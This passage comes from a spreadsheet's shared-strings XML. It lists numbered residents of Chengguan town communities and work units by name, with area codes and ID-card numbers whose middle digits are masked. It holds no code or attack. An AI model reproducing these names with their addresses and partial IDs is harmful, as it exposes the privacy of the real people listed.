    <t>412921********881X</t>
  </si>
  <si>
    <t>0727</t>
  </si>
  <si>
    <t>城关镇南外村</t>
  </si>
  <si>
    <t>王琳琳</t>
  </si>
  <si>
    <t>4113210104</t>
  </si>
  <si>
    <t>0728</t>
  </si>
  <si>
    <t>张敏</t>
  </si>
  <si>
    <t>0729</t>
  </si>
  <si>
    <t>中华社区四组</t>
  </si>
  <si>
    <t>刘国印</t>
  </si>
  <si>
    <t>0730</t>
  </si>
  <si>
    <t>杨家萍</t>
  </si>
  <si>
    <t>0731</t>
  </si>
  <si>
    <t>中华社区九组</t>
  </si>
  <si>
    <t>刘保安</t>
  </si>
  <si>
    <t>412921********1556</t>
  </si>
  <si>
    <t>0732</t>
  </si>
  <si>
    <t>张玉存</t>
  </si>
  <si>
    <t>412921********168X</t>
  </si>
  <si>
    <t>0733</t>
  </si>
  <si>
    <t>西北社区二组</t>
  </si>
  <si>
    <t>郭延龙</t>
  </si>
  <si>
    <t>0734</t>
  </si>
  <si>
    <t>西北社区四组</t>
  </si>
  <si>
    <t>栗勇</t>
  </si>
  <si>
    <t>0735</t>
  </si>
  <si>
    <t>栗明</t>
  </si>
  <si>
    <t>411326********0054</t>
  </si>
  <si>
    <t>0736</t>
  </si>
  <si>
    <t>席清栓</t>
  </si>
  <si>
    <t>0737</t>
  </si>
  <si>
    <t>李兴玉</t>
  </si>
  <si>
    <t>411326********0036</t>
  </si>
  <si>
    <t>0738</t>
  </si>
  <si>
    <t>东北社区六组</t>
  </si>
  <si>
    <t>李民</t>
  </si>
  <si>
    <t>412921********0092</t>
  </si>
  <si>
    <t>0739</t>
  </si>
  <si>
    <t>东北社区一组</t>
  </si>
  <si>
    <t>孙欣鑫</t>
  </si>
  <si>
    <t>411326********0050</t>
  </si>
  <si>
    <t>0740</t>
  </si>
  <si>
    <t>李河</t>
  </si>
  <si>
    <t>0741</t>
  </si>
  <si>
    <t>宋宽龙</t>
  </si>
  <si>
    <t>412921********0455</t>
  </si>
  <si>
    <t>0742</t>
  </si>
  <si>
    <t>赵倩</t>
  </si>
  <si>
    <t>410103********0187</t>
  </si>
  <si>
    <t>0743</t>
  </si>
  <si>
    <t>北外六组</t>
  </si>
  <si>
    <t>李连英</t>
  </si>
  <si>
    <t>0744</t>
  </si>
  <si>
    <t>城关镇中华社区</t>
  </si>
  <si>
    <t>杨明芝</t>
  </si>
  <si>
    <t>0745</t>
  </si>
  <si>
    <t>赵峰</t>
  </si>
  <si>
    <t>0746</t>
  </si>
  <si>
    <t>汪秀英</t>
  </si>
  <si>
    <t>0747</t>
  </si>
  <si>
    <t>北外五组</t>
  </si>
  <si>
    <t>李凤</t>
  </si>
  <si>
    <t>0748</t>
  </si>
  <si>
    <t>城关镇东北社区</t>
  </si>
  <si>
    <t>吴一帆</t>
  </si>
  <si>
    <t>0749</t>
  </si>
  <si>
    <t>中华社区</t>
  </si>
  <si>
    <t>王六青</t>
  </si>
  <si>
    <t>0750</t>
  </si>
  <si>
    <t>东北社区</t>
  </si>
  <si>
    <t>马青框</t>
  </si>
  <si>
    <t>0751</t>
  </si>
  <si>
    <t>李同义</t>
  </si>
  <si>
    <t>0752</t>
  </si>
  <si>
    <t>李树新</t>
  </si>
  <si>
    <t>0753</t>
  </si>
  <si>
    <t>杨雯</t>
  </si>
  <si>
    <t>0754</t>
  </si>
  <si>
    <t>郭林军</t>
  </si>
  <si>
    <t>0755</t>
  </si>
  <si>
    <t>张高申</t>
  </si>
  <si>
    <t>0756</t>
  </si>
  <si>
    <t>闫学营</t>
  </si>
  <si>
    <t>411326********0047</t>
  </si>
  <si>
    <t>0757</t>
  </si>
  <si>
    <t>西北社区</t>
  </si>
  <si>
    <t>聂新强</t>
  </si>
  <si>
    <t>412921********5511</t>
  </si>
  <si>
    <t>0758</t>
  </si>
  <si>
    <t>聂湫林</t>
  </si>
  <si>
    <t>411321********0278</t>
  </si>
  <si>
    <t>0759</t>
  </si>
  <si>
    <t>朱三燕</t>
  </si>
  <si>
    <t>0760</t>
  </si>
  <si>
    <t>张立</t>
  </si>
  <si>
    <t>0761</t>
  </si>
  <si>
    <t>随献奎</t>
  </si>
  <si>
    <t>0762</t>
  </si>
  <si>
    <t>代杰</t>
  </si>
  <si>
    <t>0763</t>
  </si>
  <si>
    <t>郭洺珲</t>
  </si>
  <si>
    <t>411321********0036</t>
  </si>
  <si>
    <t>0764</t>
  </si>
  <si>
    <t>张喜勤</t>
  </si>
  <si>
    <t>412921********3347</t>
  </si>
  <si>
    <t>2025年11月</t>
  </si>
  <si>
    <t>0765</t>
  </si>
  <si>
    <t>任明凤</t>
  </si>
  <si>
    <t>412921********0467</t>
  </si>
  <si>
    <t>0766</t>
  </si>
  <si>
    <t>崔书亮</t>
  </si>
  <si>
    <t>0767</t>
  </si>
  <si>
    <t>宋学敏</t>
  </si>
  <si>
    <t>0768</t>
  </si>
  <si>
    <t>李仁常</t>
  </si>
  <si>
    <t>0769</t>
  </si>
  <si>
    <t>程建生</t>
  </si>
  <si>
    <t>0770</t>
  </si>
  <si>
    <t>城关镇电业局</t>
  </si>
  <si>
    <t>史鸿臻</t>
  </si>
  <si>
    <t>411326********0014</t>
  </si>
  <si>
    <t>0771</t>
  </si>
  <si>
    <t>吴明倡</t>
  </si>
  <si>
    <t>411326********0112</t>
  </si>
  <si>
    <t>0772</t>
  </si>
  <si>
    <t>张庆洋</t>
  </si>
  <si>
    <t>0773</t>
  </si>
  <si>
    <t>李万春</t>
  </si>
  <si>
    <t>0774</t>
  </si>
  <si>
    <t>王爱珍</t>
  </si>
  <si>
    <t>0775</t>
  </si>
  <si>
    <t>城关镇西北社区</t>
  </si>
  <si>
    <t>熊秀奇</t>
  </si>
  <si>
    <t>0776</t>
  </si>
  <si>
    <t>王玉甫</t>
  </si>
  <si>
    <t>0777</t>
  </si>
  <si>
    <t>城关镇北外社区</t>
  </si>
  <si>
    <t>武威</t>
  </si>
  <si>
    <t>0778</t>
  </si>
  <si>
    <t>翟玉凤</t>
  </si>
  <si>
    <t>412921********0189</t>
  </si>
  <si>
    <t>0779</t>
  </si>
  <si>
    <t>张建军</t>
  </si>
  <si>
    <t>0780</t>
  </si>
  <si>
    <t>李植鑫</t>
  </si>
  <si>
    <t>410325********0392</t>
  </si>
  <si>
    <t>0781</t>
  </si>
  <si>
    <t>席国梅</t>
  </si>
  <si>
    <t>0782</t>
  </si>
  <si>
    <t>方元媛</t>
  </si>
  <si>
    <t>411321********3428</t>
  </si>
  <si>
    <t>0783</t>
  </si>
  <si>
    <t>方梓豪</t>
  </si>
  <si>
    <t>411321********0118</t>
  </si>
  <si>
    <t>0784</t>
  </si>
  <si>
    <t>林广云</t>
  </si>
  <si>
    <t>0785</t>
  </si>
  <si>
    <t>任行玉</t>
  </si>
  <si>
    <t>0786</t>
  </si>
  <si>
    <t>杨兴珍</t>
  </si>
  <si>
    <t>0787</t>
  </si>
  <si>
    <t>东北社区
外贸局</t>
  </si>
  <si>
    <t>徐召伟</t>
  </si>
  <si>
    <t>0788</t>
  </si>
  <si>
    <t>东北社区
黄金局</t>
  </si>
  <si>
    <t>李同生</t>
  </si>
  <si>
    <t>0789</t>
  </si>
  <si>
    <t>东北社区蚕业局</t>
  </si>
  <si>
    <t>张文钦</t>
  </si>
  <si>
    <t>0790</t>
  </si>
  <si>
    <t>南外社区中医院</t>
  </si>
  <si>
    <t>李长兴</t>
  </si>
  <si>
    <t>0791</t>
  </si>
  <si>
    <t>杨振华</t>
  </si>
  <si>
    <t>0792</t>
  </si>
  <si>
    <t>南外社区印刷厂</t>
  </si>
  <si>
    <t>华蕊</t>
  </si>
  <si>
    <t>0793</t>
  </si>
  <si>
    <t>张园园</t>
  </si>
  <si>
    <t>411326********5121</t>
  </si>
  <si>
    <t>0794</t>
  </si>
  <si>
    <t>张恩华</t>
  </si>
  <si>
    <t>411321********0075</t>
  </si>
  <si>
    <t>0795</t>
  </si>
  <si>
    <t>赵闯</t>
  </si>
  <si>
    <t>412921********4016</t>
  </si>
  <si>
    <t>0796</t>
  </si>
  <si>
    <t>徐成峰</t>
  </si>
  <si>
    <t>412921********404X</t>
  </si>
  <si>
    <t>0797</t>
  </si>
  <si>
    <t>王涛</t>
  </si>
  <si>
    <t>412921********2856</t>
  </si>
  <si>
    <t>0798</t>
  </si>
  <si>
    <t>南外社区教育局</t>
  </si>
  <si>
    <t>吕云朋</t>
  </si>
  <si>
    <t>0799</t>
  </si>
  <si>
    <t>李红伟</t>
  </si>
  <si>
    <t>412921********1135</t>
  </si>
  <si>
    <t>0800</t>
  </si>
  <si>
    <t>南外社区文化局</t>
  </si>
  <si>
    <t>王冬梅</t>
  </si>
  <si>
    <t>0801</t>
  </si>
  <si>
    <t>西北社区商业中心</t>
  </si>
  <si>
    <t>陈贞均</t>
  </si>
  <si>
    <t>412921********4434</t>
  </si>
  <si>
    <t>0802</t>
  </si>
  <si>
    <t>张文宇</t>
  </si>
  <si>
    <t>0803</t>
  </si>
  <si>
    <t>西北社区工信局</t>
  </si>
  <si>
    <t>贺小华</t>
  </si>
  <si>
    <t>0804</t>
  </si>
  <si>
    <t>西北社区卫生局</t>
  </si>
  <si>
    <t>王聚荣</t>
  </si>
  <si>
    <t>0805</t>
  </si>
  <si>
    <t>魏清军</t>
  </si>
  <si>
    <t>412921********0114</t>
  </si>
  <si>
    <t>0806</t>
  </si>
  <si>
    <t>韩峰</t>
  </si>
  <si>
    <t>0807</t>
  </si>
  <si>
    <t>闫涛</t>
  </si>
  <si>
    <t>0808</t>
  </si>
  <si>
    <t>西北社区教育局</t>
  </si>
  <si>
    <t>郭心盈</t>
  </si>
  <si>
    <t>0809</t>
  </si>
  <si>
    <t>李梦博</t>
  </si>
  <si>
    <t>411321********0199</t>
  </si>
  <si>
    <t>0810</t>
  </si>
  <si>
    <t>刘岩</t>
  </si>
  <si>
    <t>0811</t>
  </si>
  <si>
    <t>宋苑苑</t>
  </si>
  <si>
    <t>411326********0065</t>
  </si>
  <si>
    <t>0812</t>
  </si>
  <si>
    <t>王世献</t>
  </si>
  <si>
    <t>412921********2019</t>
  </si>
  <si>
    <t>0813</t>
  </si>
  <si>
    <t>黄彪</t>
  </si>
  <si>
    <t>0814</t>
  </si>
  <si>
    <t>董可九</t>
  </si>
  <si>
    <t>0815</t>
  </si>
  <si>
    <t>西北社区县社</t>
  </si>
  <si>
    <t>任柯</t>
  </si>
  <si>
    <t>0816</t>
  </si>
  <si>
    <t>李兴平</t>
  </si>
  <si>
    <t>0817</t>
  </si>
  <si>
    <t>李硕</t>
  </si>
  <si>
    <t>0818</t>
  </si>
  <si>
    <t>郭庆敏</t>
  </si>
  <si>
    <t>0819</t>
  </si>
  <si>
    <t>靳立军</t>
  </si>
  <si>
    <t>412921********4411</t>
  </si>
  <si>
    <t>0820</t>
  </si>
  <si>
    <t>张万丽</t>
  </si>
  <si>
    <t>412921********4426</t>
  </si>
  <si>
    <t>0821</t>
  </si>
  <si>
    <t>田万刚</t>
  </si>
  <si>
    <t>412921********3812</t>
  </si>
  <si>
    <t>0822</t>
  </si>
  <si>
    <t>张瑞霞</t>
  </si>
  <si>
    <t>0823</t>
  </si>
  <si>
    <t>张刚</t>
  </si>
  <si>
    <t>0824</t>
  </si>
  <si>
    <t>刘小刚</t>
  </si>
  <si>
    <t>0825</t>
  </si>
  <si>
    <t>杜建东</t>
  </si>
  <si>
    <t>412921********1871</t>
  </si>
  <si>
    <t>0826</t>
  </si>
  <si>
    <t>鲁德锋</t>
  </si>
  <si>
    <t>412921********245X</t>
  </si>
  <si>
    <t>0827</t>
  </si>
  <si>
    <t>董兆斌</t>
  </si>
  <si>
    <t>412921********4496</t>
  </si>
  <si>
    <t>0828</t>
  </si>
  <si>
    <t>段彬</t>
  </si>
  <si>
    <t>412921********4447</t>
  </si>
  <si>
    <t>0829</t>
  </si>
  <si>
    <t>袁金圃</t>
  </si>
  <si>
    <t>0830</t>
  </si>
  <si>
    <t>李瑞</t>
  </si>
  <si>
    <t>412921********5006</t>
  </si>
  <si>
    <t>0831</t>
  </si>
  <si>
    <t>徐英</t>
  </si>
  <si>
    <t>412921********0422</t>
  </si>
  <si>
    <t>0832</t>
  </si>
  <si>
    <t>段兴珍</t>
  </si>
  <si>
    <t>412921********042X</t>
  </si>
  <si>
    <t>0833</t>
  </si>
  <si>
    <t>乔道峰</t>
  </si>
  <si>
    <t>412921********0050</t>
  </si>
  <si>
    <t>0834</t>
  </si>
  <si>
    <t>西北社区粮食局</t>
  </si>
  <si>
    <t>姜德高</t>
  </si>
  <si>
    <t>412921********1631</t>
  </si>
  <si>
    <t>0835</t>
  </si>
  <si>
    <t>于献波</t>
  </si>
  <si>
    <t>0836</t>
  </si>
  <si>
    <t>曾峰</t>
  </si>
  <si>
    <t>412921********1635</t>
  </si>
  <si>
    <t>0837</t>
  </si>
  <si>
    <t>杨金生</t>
  </si>
  <si>
    <t>0838</t>
  </si>
  <si>
    <t>杨惠雯</t>
  </si>
  <si>
    <t>411321********6281</t>
  </si>
  <si>
    <t>0839</t>
  </si>
  <si>
    <t>杨智斌</t>
  </si>
  <si>
    <t>411321********0154</t>
  </si>
  <si>
    <t>0840</t>
  </si>
  <si>
    <t>翟新兰</t>
  </si>
  <si>
    <t>0841</t>
  </si>
  <si>
    <t>张一倩</t>
  </si>
  <si>
    <t>411321********0029</t>
  </si>
  <si>
    <t>0842</t>
  </si>
  <si>
    <t>张同国</t>
  </si>
  <si>
    <t>0843</t>
  </si>
  <si>
    <t>张红敏</t>
  </si>
  <si>
    <t>0844</t>
  </si>
  <si>
    <t>刘泓远</t>
  </si>
  <si>
    <t>411321********0055</t>
  </si>
  <si>
    <t>0845</t>
  </si>
  <si>
    <t>王延东</t>
  </si>
  <si>
    <t>0846</t>
  </si>
  <si>
    <t>黄强</t>
  </si>
  <si>
    <t>412921********0096</t>
  </si>
  <si>
    <t>0847</t>
  </si>
  <si>
    <t>石军贵</t>
  </si>
  <si>
    <t>0848</t>
  </si>
  <si>
    <t>西北社区文化局</t>
  </si>
  <si>
    <t>张小山</t>
  </si>
  <si>
    <t>0849</t>
  </si>
  <si>
    <t>张小平</t>
  </si>
  <si>
    <t>0850</t>
  </si>
  <si>
    <t>张国东</t>
  </si>
  <si>
    <t>0851</t>
  </si>
  <si>
    <t>李培支</t>
  </si>
  <si>
    <t>0852</t>
  </si>
  <si>
    <t>索国明</t>
  </si>
  <si>
    <t>0853</t>
  </si>
  <si>
    <t>余海洋</t>
  </si>
  <si>
    <t>0854</t>
  </si>
  <si>
    <t>中华社区物资局</t>
  </si>
  <si>
    <t>卢中敏</t>
  </si>
  <si>
    <t>412921********4841</t>
  </si>
  <si>
    <t>0855</t>
  </si>
  <si>
    <t>中华社区就业办</t>
  </si>
  <si>
    <t>张浩</t>
  </si>
  <si>
    <t>0856</t>
  </si>
  <si>
    <t>张鲁豫</t>
  </si>
  <si>
    <t>0857</t>
  </si>
  <si>
    <t>中华社区工信局</t>
  </si>
  <si>
    <t>张居青</t>
  </si>
  <si>
    <t>0858</t>
  </si>
  <si>
    <t>中华社区缫丝厂</t>
  </si>
  <si>
    <t>赵国欣</t>
  </si>
  <si>
    <t>0859</t>
  </si>
  <si>
    <t>刘宏春</t>
  </si>
  <si>
    <t>412921********1119</t>
  </si>
  <si>
    <t>0860</t>
  </si>
  <si>
    <t>贾青有</t>
  </si>
  <si>
    <t>0861</t>
  </si>
  <si>
    <t>贺保丽</t>
  </si>
  <si>
    <t>0862</t>
  </si>
  <si>
    <t>中华社区民政局</t>
  </si>
  <si>
    <t>张文强</t>
  </si>
  <si>
    <t>0863</t>
  </si>
  <si>
    <t>詹秀辉</t>
  </si>
  <si>
    <t>0864</t>
  </si>
  <si>
    <t>常津</t>
  </si>
  <si>
    <t>411321********5176</t>
  </si>
  <si>
    <t>0865</t>
  </si>
  <si>
    <t>中华社区乡镇局</t>
  </si>
  <si>
    <t>潘姣霞</t>
  </si>
  <si>
    <t>0866</t>
  </si>
  <si>
    <t>中华社区粮食局</t>
  </si>
  <si>
    <t>王铁生</t>
  </si>
  <si>
    <t>0867</t>
  </si>
  <si>
    <t>栗红</t>
  </si>
  <si>
    <t>0868</t>
  </si>
  <si>
    <t>祖少卿</t>
  </si>
  <si>
    <t>412921********0155</t>
  </si>
  <si>
    <t>0869</t>
  </si>
  <si>
    <t>中华社区商业中心</t>
  </si>
  <si>
    <t>岳建</t>
  </si>
  <si>
    <t>412921********0151</t>
  </si>
  <si>
    <t>0870</t>
  </si>
  <si>
    <t>张小虎</t>
  </si>
  <si>
    <t>0871</t>
  </si>
  <si>
    <t>孙玉良</t>
  </si>
  <si>
    <t>0872</t>
  </si>
  <si>
    <t>闫荣华</t>
  </si>
  <si>
    <t>0873</t>
  </si>
  <si>
    <t>关红军</t>
  </si>
  <si>
    <t>412921********0098</t>
  </si>
  <si>
    <t>0874</t>
  </si>
  <si>
    <t>余运富</t>
  </si>
  <si>
    <t>0875</t>
  </si>
  <si>
    <t>朱德敏</t>
  </si>
  <si>
    <t>0876</t>
  </si>
  <si>
    <t>中华社区外贸局</t>
  </si>
  <si>
    <t>张军平</t>
  </si>
  <si>
    <t>0877</t>
  </si>
  <si>
    <t>闫荣均</t>
  </si>
  <si>
    <t>0878</t>
  </si>
  <si>
    <t>李朝阳</t>
  </si>
  <si>
    <t>0879</t>
  </si>
  <si>
    <t>赵刚</t>
  </si>
  <si>
    <t>0880</t>
  </si>
  <si>
    <t>张重一</t>
  </si>
  <si>
    <t>411326********005X</t>
  </si>
  <si>
    <t>0881</t>
  </si>
  <si>
    <t>张俊然</t>
  </si>
  <si>
    <t>411321********0021</t>
  </si>
  <si>
    <t>0882</t>
  </si>
  <si>
    <t>张俊涵</t>
  </si>
  <si>
    <t>411321********0107</t>
  </si>
  <si>
    <t>0883</t>
  </si>
  <si>
    <t>马新斐</t>
  </si>
  <si>
    <t>411321********006X</t>
  </si>
  <si>
    <t>0884</t>
  </si>
  <si>
    <t>李栋</t>
  </si>
  <si>
    <t>0885</t>
  </si>
  <si>
    <t>张天亮</t>
  </si>
  <si>
    <t>412921********0171</t>
  </si>
  <si>
    <t>0886</t>
  </si>
  <si>
    <t>田万红</t>
  </si>
  <si>
    <t>412921********3648</t>
  </si>
  <si>
    <t>0887</t>
  </si>
  <si>
    <t>张天景</t>
  </si>
  <si>
    <t>0888</t>
  </si>
  <si>
    <t>高丽</t>
  </si>
  <si>
    <t>0889</t>
  </si>
  <si>
    <t>孙俊宝</t>
  </si>
  <si>
    <t>0890</t>
  </si>
  <si>
    <t>0891</t>
  </si>
  <si>
    <t>中华社区农机局</t>
  </si>
  <si>
    <t>宋长栓</t>
  </si>
  <si>
    <t>0892</t>
  </si>
  <si>
    <t>中华社区林业局</t>
  </si>
  <si>
    <t>王云霏</t>
  </si>
  <si>
    <t>411321********0746</t>
  </si>
  <si>
    <t>0893</t>
  </si>
  <si>
    <t>张德成</t>
  </si>
  <si>
    <t>0894</t>
  </si>
  <si>
    <t>李金春</t>
  </si>
  <si>
    <t>0895</t>
  </si>
  <si>
    <t>李金华</t>
  </si>
  <si>
    <t>412921********1622</t>
  </si>
  <si>
    <t>0896</t>
  </si>
  <si>
    <t>杨新生</t>
  </si>
  <si>
    <t>412921********1573</t>
  </si>
  <si>
    <t>0897</t>
  </si>
  <si>
    <t>杨韵彰</t>
  </si>
  <si>
    <t>411321********0476</t>
  </si>
  <si>
    <t>0898</t>
  </si>
  <si>
    <t>樊建峰</t>
  </si>
  <si>
    <t>412921********155X</t>
  </si>
  <si>
    <t>0899</t>
  </si>
  <si>
    <t>王文召</t>
  </si>
  <si>
    <t>0900</t>
  </si>
  <si>
    <t>王灿</t>
  </si>
  <si>
    <t>0901</t>
  </si>
  <si>
    <t>王成丽</t>
  </si>
  <si>
    <t>0902</t>
  </si>
  <si>
    <t>胡延红</t>
  </si>
  <si>
    <t>0903</t>
  </si>
  <si>
    <t>和召阳</t>
  </si>
  <si>
    <t>0904</t>
  </si>
  <si>
    <t>和煜铭</t>
  </si>
  <si>
    <t>411321********3055</t>
  </si>
  <si>
    <t>0905</t>
  </si>
  <si>
    <t>中华社区电线厂</t>
  </si>
  <si>
    <t>黄书全</t>
  </si>
  <si>
    <t>0906</t>
  </si>
  <si>
    <t>中华社区交通局</t>
  </si>
  <si>
    <t>彭春英</t>
  </si>
  <si>
    <t>0907</t>
  </si>
  <si>
    <t>杜培军</t>
  </si>
  <si>
    <t>0908</t>
  </si>
  <si>
    <t>隋闯奎</t>
  </si>
  <si>
    <t>0909</t>
  </si>
  <si>
    <t>王九瑞</t>
  </si>
  <si>
    <t>412921********3466</t>
  </si>
  <si>
    <t>0910</t>
  </si>
  <si>
    <t>尹延武</t>
  </si>
  <si>
    <t>0911</t>
  </si>
  <si>
    <t>濮延慧</t>
  </si>
  <si>
    <t>0912</t>
  </si>
  <si>
    <t>陆万芝</t>
  </si>
  <si>
    <t>0913</t>
  </si>
  <si>
    <t>程远生</t>
  </si>
  <si>
    <t>0914</t>
  </si>
  <si>
    <t>毛金兰</t>
  </si>
  <si>
    <t>0915</t>
  </si>
  <si>
    <t>杨金娜</t>
  </si>
  <si>
    <t>0916</t>
  </si>
  <si>
    <t>林书战</t>
  </si>
  <si>
    <t>0917</t>
  </si>
  <si>
    <t>杨大军</t>
  </si>
  <si>
    <t>0918</t>
  </si>
  <si>
    <t>尹芳春</t>
  </si>
  <si>
    <t>412921********6002</t>
  </si>
  <si>
    <t>0919</t>
  </si>
  <si>
    <t>王俊杰</t>
  </si>
  <si>
    <t>412921********4422</t>
  </si>
  <si>
    <t>0920</t>
  </si>
  <si>
    <t>蔡沅卓</t>
  </si>
  <si>
    <t>0921</t>
  </si>
  <si>
    <t>郭兰</t>
  </si>
  <si>
    <t>412921********0729</t>
  </si>
  <si>
    <t>0922</t>
  </si>
  <si>
    <t>张清彦</t>
  </si>
  <si>
    <t>412921********101X</t>
  </si>
  <si>
    <t>0923</t>
  </si>
  <si>
    <t>孙小平</t>
  </si>
  <si>
    <t>0924</t>
  </si>
  <si>
    <t>王林普</t>
  </si>
  <si>
    <t>411326********4014</t>
  </si>
  <si>
    <t>0925</t>
  </si>
  <si>
    <t>余金春</t>
  </si>
  <si>
    <t>0926</t>
  </si>
  <si>
    <t>孙献伟</t>
  </si>
  <si>
    <t>0927</t>
  </si>
  <si>
    <t>张金枝</t>
  </si>
  <si>
    <t>0928</t>
  </si>
  <si>
    <t>李道林</t>
  </si>
  <si>
    <t>412921********1198</t>
  </si>
  <si>
    <t>0929</t>
  </si>
  <si>
    <t>刘旗</t>
  </si>
  <si>
    <t>0930</t>
  </si>
  <si>
    <t>王素云</t>
  </si>
  <si>
    <t>412921********1566</t>
  </si>
  <si>
    <t>0931</t>
  </si>
  <si>
    <t>李春芳</t>
  </si>
  <si>
    <t>0932</t>
  </si>
  <si>
    <t>潘长松</t>
  </si>
  <si>
    <t>412921********3651</t>
  </si>
  <si>
    <t>0933</t>
  </si>
  <si>
    <t>戴东</t>
  </si>
  <si>
    <t>0934</t>
  </si>
  <si>
    <t>中华社区蚕业局</t>
  </si>
  <si>
    <t>张金桥</t>
  </si>
  <si>
    <t>412921********3314</t>
  </si>
  <si>
    <t>0935</t>
  </si>
  <si>
    <t>中华社区饮食服务公司</t>
  </si>
  <si>
    <t>张聚奇</t>
  </si>
  <si>
    <t>0936</t>
  </si>
  <si>
    <t>晋军</t>
  </si>
  <si>
    <t>0937</t>
  </si>
  <si>
    <t>中华社区巢丝厂</t>
  </si>
  <si>
    <t>朱舜禹</t>
  </si>
  <si>
    <t>0938</t>
  </si>
  <si>
    <t>黄珍</t>
  </si>
  <si>
    <t>412921********013X</t>
  </si>
  <si>
    <t>0939</t>
  </si>
  <si>
    <t>黄梦钰</t>
  </si>
  <si>
    <t>411321********5966</t>
  </si>
  <si>
    <t>0940</t>
  </si>
  <si>
    <t>宋明莘</t>
  </si>
  <si>
    <t>411321********035X</t>
  </si>
  <si>
    <t>0941</t>
  </si>
  <si>
    <t>宋明扬</t>
  </si>
  <si>
    <t>411321********0190</t>
  </si>
  <si>
    <t>0942</t>
  </si>
  <si>
    <t>李想</t>
  </si>
  <si>
    <t>0943</t>
  </si>
  <si>
    <t>梁浩楠</t>
  </si>
  <si>
    <t>411321********0034</t>
  </si>
  <si>
    <t>0944</t>
  </si>
  <si>
    <t>中华社区木材公司</t>
  </si>
  <si>
    <t>王春秀</t>
  </si>
  <si>
    <t>0945</t>
  </si>
  <si>
    <t>李世召</t>
  </si>
  <si>
    <t>0946</t>
  </si>
  <si>
    <t>王劲松</t>
  </si>
  <si>
    <t>0947</t>
  </si>
  <si>
    <t>王康桥</t>
  </si>
  <si>
    <t>0948</t>
  </si>
  <si>
    <t>陈秀芝</t>
  </si>
  <si>
    <t>0949</t>
  </si>
  <si>
    <t>赵旌博</t>
  </si>
  <si>
    <t>0950</t>
  </si>
  <si>
    <t>胡文克</t>
  </si>
  <si>
    <t>411326********5155</t>
  </si>
  <si>
    <t>0951</t>
  </si>
  <si>
    <t>胡靖雨</t>
  </si>
  <si>
    <t>411321********2892</t>
  </si>
  <si>
    <t>0952</t>
  </si>
  <si>
    <t>李胜文</t>
  </si>
  <si>
    <t>412921********153X</t>
  </si>
  <si>
    <t>0953</t>
  </si>
  <si>
    <t>田广珍</t>
  </si>
  <si>
    <t>412921********164X</t>
  </si>
  <si>
    <t>0954</t>
  </si>
  <si>
    <t>张会远</t>
  </si>
  <si>
    <t>0955</t>
  </si>
  <si>
    <t>薛健</t>
  </si>
  <si>
    <t>0956</t>
  </si>
  <si>
    <t>王建军</t>
  </si>
  <si>
    <t>0957</t>
  </si>
  <si>
    <t>刘军</t>
  </si>
  <si>
    <t>0958</t>
  </si>
  <si>
    <t>闫长荣</t>
  </si>
  <si>
    <t>412921********1529</t>
  </si>
  <si>
    <t>0959</t>
  </si>
  <si>
    <t>王茂晓</t>
  </si>
  <si>
    <t>411321********0212</t>
  </si>
  <si>
    <t>0960</t>
  </si>
  <si>
    <t>赵华</t>
  </si>
  <si>
    <t>412921********1586</t>
  </si>
  <si>
    <t>0961</t>
  </si>
  <si>
    <t>王景峰</t>
  </si>
  <si>
    <t>412921********5916</t>
  </si>
  <si>
    <t>0962</t>
  </si>
  <si>
    <t>孙伟</t>
  </si>
  <si>
    <t>0963</t>
  </si>
  <si>
    <t>民主社区石油公司</t>
  </si>
  <si>
    <t>王岩</t>
  </si>
  <si>
    <t>411326********004X</t>
  </si>
  <si>
    <t>4113210105</t>
  </si>
  <si>
    <t>0964</t>
  </si>
  <si>
    <t>民主社区工信局</t>
  </si>
  <si>
    <t>王长华</t>
  </si>
  <si>
    <t>0965</t>
  </si>
  <si>
    <t>田光连</t>
  </si>
  <si>
    <t>0966</t>
  </si>
  <si>
    <t>郭树峰</t>
  </si>
  <si>
    <t>0967</t>
  </si>
  <si>
    <t>蔡庆炜</t>
  </si>
  <si>
    <t>0968</t>
  </si>
  <si>
    <t>张建凤</t>
  </si>
  <si>
    <t>0969</t>
  </si>
  <si>
    <t>彭建华</t>
  </si>
  <si>
    <t>0970</t>
  </si>
  <si>
    <t>王东升</t>
  </si>
  <si>
    <t>0971</t>
  </si>
  <si>
    <t>张新恒</t>
  </si>
  <si>
    <t>412921********441X</t>
  </si>
  <si>
    <t>0972</t>
  </si>
  <si>
    <t>张茗豪</t>
  </si>
  <si>
    <t>411321********0710</t>
  </si>
  <si>
    <t>0973</t>
  </si>
  <si>
    <t>吴海静</t>
  </si>
  <si>
    <t>412921********4501</t>
  </si>
  <si>
    <t>0974</t>
  </si>
  <si>
    <t>0975</t>
  </si>
  <si>
    <t>民主社区县社</t>
  </si>
  <si>
    <t>郭淼</t>
  </si>
  <si>
    <t>0976</t>
  </si>
  <si>
    <t>谷奇恩</t>
  </si>
  <si>
    <t>0977</t>
  </si>
  <si>
    <t>潘雲</t>
  </si>
  <si>
    <t>0978</t>
  </si>
  <si>
    <t>蔡磊</t>
  </si>
  <si>
    <t>0979</t>
  </si>
  <si>
    <t>民主社区粮食局</t>
  </si>
  <si>
    <t>杜明强</t>
  </si>
  <si>
    <t>412921********3697</t>
  </si>
  <si>
    <t>0980</t>
  </si>
  <si>
    <t>李玉国</t>
  </si>
  <si>
    <t>0981</t>
  </si>
  <si>
    <t>周河歧</t>
  </si>
  <si>
    <t>0982</t>
  </si>
  <si>
    <t>张庆雨</t>
  </si>
  <si>
    <t>412921********3611</t>
  </si>
  <si>
    <t>0983</t>
  </si>
  <si>
    <t>北外社区教育局</t>
  </si>
  <si>
    <t>杨洪昌</t>
  </si>
  <si>
    <t>412921********3614</t>
  </si>
  <si>
    <t>0984</t>
  </si>
  <si>
    <t>北外社区工信局</t>
  </si>
  <si>
    <t>林太明</t>
  </si>
  <si>
    <t>0985</t>
  </si>
  <si>
    <t>张荣珍</t>
  </si>
  <si>
    <t>412921********5823</t>
  </si>
  <si>
    <t>0986</t>
  </si>
  <si>
    <t>北外社区粮食局</t>
  </si>
  <si>
    <t>王山平</t>
  </si>
  <si>
    <t>0987</t>
  </si>
  <si>
    <t>北外社区县社</t>
  </si>
  <si>
    <t>孙书超</t>
  </si>
  <si>
    <t>0988</t>
  </si>
  <si>
    <t>412921********481X</t>
  </si>
  <si>
    <t>0989</t>
  </si>
  <si>
    <t>王晓峰</t>
  </si>
  <si>
    <t>0990</t>
  </si>
  <si>
    <t>张殿基</t>
  </si>
  <si>
    <t>0991</t>
  </si>
  <si>
    <t>李贵霞</t>
  </si>
  <si>
    <t>412921********0428</t>
  </si>
  <si>
    <t>0992</t>
  </si>
  <si>
    <t>翟广奇</t>
  </si>
  <si>
    <t>0993</t>
  </si>
  <si>
    <t>刘贵兰</t>
  </si>
  <si>
